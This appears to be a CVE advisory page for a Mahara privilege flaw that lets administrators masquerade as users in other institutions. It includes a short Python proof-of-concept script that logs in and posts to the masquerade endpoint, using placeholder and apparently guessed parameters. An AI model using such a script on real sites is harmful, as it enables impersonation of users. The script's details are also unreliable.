Security Vulnerability Report
中文
CVE-2025-59308 CVSS 4.7 MEDIUM

CVE-2025-59308

Published: 2026-04-24 16:16:24
Last Modified: 2026-04-24 17:54:36
Source: [email protected]

Description

In Mahara before 24.04.10 and 25 before 25.04.1, an institution administrator or institution support administrator on a multi-tenanted site can masquerade as an institution member in an institution for which they are not an administrator, if they also have the 'Site staff' role.

CVSS Details

CVSS Score
4.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Mahara < 24.04.10
Mahara < 25.04.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC Concept: Demonstrate privilege escalation via masquerade # Attacker prerequisite: 'Site staff' role + 'Institution Admin' role import requests # Target configuration base_url = "https://target-mahara-site.com" login_url = f"{base_url}/login.php" masquerade_url = f"{base_url}/admin/users/masquerade.php" # Attacker credentials (with Site Staff role) session = requests.Session() payload = { 'username': 'attacker_admin', 'password': 'password' } session.post(login_url, data=payload) # Attempt to masquerade as a user in a DIFFERENT institution # where the attacker does NOT have admin rights. poc_data = { 'userid': 'victim_user_id_in_other_institution', 'usertype': 'user' } response = session.post(masquerade_url, data=poc_data) if response.status_code == 200 and "victim_user_id_in_other_institution" in response.text: print("[+] Vulnerability Exploited! Successfully masqueraded as external user.") else: print("[-] Exploit failed or patch applied.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59308", "sourceIdentifier": "[email protected]", "published": "2026-04-24T16:16:23.610", "lastModified": "2026-04-24T17:54:36.243", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Mahara before 24.04.10 and 25 before 25.04.1, an institution administrator or institution support administrator on a multi-tenanted site can masquerade as an institution member in an institution for which they are not an administrator, if they also have the 'Site staff' role."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 3.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://mahara.org", "source": "[email protected]"}, {"url": "https://mahara.org/interaction/forum/topic.php?id=9851", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.